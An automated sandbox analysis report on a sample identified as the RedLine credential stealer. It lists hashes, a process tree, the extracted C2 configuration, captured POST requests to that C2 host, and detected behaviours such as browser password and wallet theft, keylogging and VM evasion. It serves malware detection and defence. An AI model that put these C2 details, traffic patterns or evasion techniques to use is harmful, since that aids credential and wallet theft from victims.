Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report kS2dqbsDwD

Overview

General Information

Sample Name:kS2dqbsDwD (renamed file extension from none to exe)
Analysis ID:452457
MD5:888ab99280a081717ec5c5749266d1bd
SHA1:3a071aeadd42c1232ff2878d2adf7f1e4a629180
SHA256:e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
May check the online IP address of the machine
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to a URL shortener service
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • kS2dqbsDwD.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\kS2dqbsDwD.exe' MD5: 888AB99280A081717EC5C5749266D1BD)
    • 325.exe (PID: 4796 cmdline: C:\Users\user\AppData\Roaming\325.exe 325 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 325.exe (PID: 1784 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Process Memory Space: 325.exe PID: 4796JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: 325.exe PID: 1784JoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.325.exe.3b45a60.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                14.2.325.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  2.2.325.exe.3b45a60.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 14.2.325.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeReversingLabs: Detection: 33%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: kS2dqbsDwD.exeVirustotal: Detection: 20%Perma Link
                    Source: kS2dqbsDwD.exeReversingLabs: Detection: 13%
                    Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2390 FindFirstFileW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,

                    Networking:

                    barindex
                    May check the online IP address of the machineShow sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeDNS query: name: iplogger.org
                    Performs DNS queries to domains with low reputationShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeDNS query: name: is.gd
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: yspasenana.xyzContent-Length: 1125491Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: yspasenana.xyzContent-Length: 1125483Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                    Source: Joe Sandbox ViewIP Address: 104.25.234.53 104.25.234.53
                    Source: Joe Sandbox ViewASN Name: DE-FIRSTCOLOwwwfirst-colonetDE DE-FIRSTCOLOwwwfirst-colonetDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: unknownDNS traffic detected: queries for: iplogger.org
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.org
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.orgCould
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                    Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
